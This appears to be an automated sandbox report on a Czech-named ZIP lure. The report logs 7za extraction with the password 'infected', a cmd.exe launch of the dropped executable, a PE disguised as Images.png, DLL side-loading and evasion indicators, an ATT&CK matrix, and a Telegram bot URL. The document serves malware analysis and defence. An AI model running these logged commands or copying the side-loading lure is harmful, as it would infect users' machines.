Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\5nsywy4n.y2a" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"	Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\7za.exe	Section loaded: 7z.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\7za.exe	Section loaded: 7z.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\unarchiver.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source:	Binary string: /app/crashsubmit?appname=SumatraPDFhttp://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5.3.0.pdbSumatraPDF.pdblibmupdf.pdbSumatraPDF-no-MuPDF.pdbhttp://kjkpub.s3.amazonaws.com/sumatrapdf/prerel/SumatraPDF-prerelease-SVN_PRE_RELEASE_VER.pdb.zipsymbols_tmp.ziphttp://kjkpub.s3.amazonaws.com/sumatrapdf/rel/SumatraPDF-1.5.3.0.pdb.zipsymbols_tmp.zipSUMATRAPDF_FULLDUMPHaihaisoft PDF Reader crashedSorry, that shouldn't have happened! source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: SumatraPDF-no-MuPDF.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: SumatraPDF-1.5.3.0.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.14.dr
Source:	Binary string: m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: xOdx>a0m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb! source: Images.png.14.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.14.dr
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: Images.png.14.dr
Source:	Binary string: libmupdf.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp

Source: vcruntime140.dll.14.dr

Static PE information: 0xC7A64295 [Sat Feb 22 01:53:25 2076 UTC]

Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe

Code function: 18_2_73D61090 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,

18_2_73D61090

Source: Images.png.14.dr

Static PE information: section name: _RDATA

Source: C:\Windows\SysWOW64\unarchiver.exe	Code function: 13_2_019B05D0 push cs; iretd	13_2_019B05D5
Source: C:\Windows\SysWOW64\unarchiver.exe	Code function: 13_2_019B05C0 push cs; iretd	13_2_019B05C5
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Code function: 18_2_6FDFF8A0 push eax; ret	18_2_6FDFF8BE
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Code function: 18_2_6FDFF26E push ecx; ret	18_2_6FDFF281

Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\version.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Images.png	Jump to dropped file

Source: C:\Windows\SysWOW64\7za.exe

File created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Images.png

Jump to dropped file

Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected ZipBomb

Source: Yara match

File source: C:\Users\user\Downloads\68c8e194-372f-4d65-ab89-d63f8d42e0ea.tmp, type: DROPPED

Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 1940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 3310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 5310000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 1380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 51C0000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\7za.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Images.png

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe

API coverage: 4.9 %

Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6880

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\unarchiver.exe

Code function: 13_2_014FB1D6 GetSystemInfo,

13_2_014FB1D6

Source: C:\Windows\SysWOW64\unarchiver.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe

Code function: 18_2_73D619D9 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

18_2_73D619D9

Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe

Code function: 18_2_73D61090 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,

18_2_73D61090

Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Code function: 18_2_6FDFF8BF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_6FDFF8BF
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Code function: 18_2_73D619D9 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_73D619D9
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Code function: 18_2_73D61F12 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_73D61F12

Source: C:\Windows\SysWOW64\unarchiver.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\5nsywy4n.y2a" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe

Code function: 18_2_0049A377 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

18_2_0049A377

Source: C:\Windows\SysWOW64\unarchiver.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	14 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://tinyurl.com/yep5ph9f	0%	Avira URL Cloud	safe

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Images.png	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\version.dll	0%	ReversingLabs

Name	Source	Malicious	Reputation
http://www.zeniko.ch/#SumatraPDFSimon	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://blog.kowalczyk.info/software/sumatrapdf/translators.htmlThe	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.drm-x.net/http://cn.drm-x.com/LicPrepare2008.aspxLicPrepare20082013.aspx.drm-x.com/2/%s?c	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
https://t.me/MEXX6toHNBot	Evidence.??d??o??c??x.14.dr	false	high
http://itexmac.sourceforge.net/SyncTeX.htmlJ	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://HDMHDMLoading...%s	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.drm-x.com/pdfversion.htm1.5.7.0..http://www.haihaisoft.com/PDF_Reader_download.aspxopenSo	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.flashvidz.tk/Zenonprogram	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://p.yusukekamiyamane.com/Yusuke	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://mailto:EmbeddedFilesTypeFilespecD%s%dR%s%sA%s%sKids.seen.seen.seenNumsSPStD%s.%d:%d:%dInfoPag	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.haihaisoft.com/Contact.aspx	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.freetype.org/FreeTypefont	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.haihaisoft.com/PDF_Reader_download.aspxhttp://www.drm-x.com/pdfversion.htmMS	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://blog.kowalczyk.info/software/sumatrapdf/translations.htmlContribute	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://william.famille-blum.org/William	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0Digitized	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
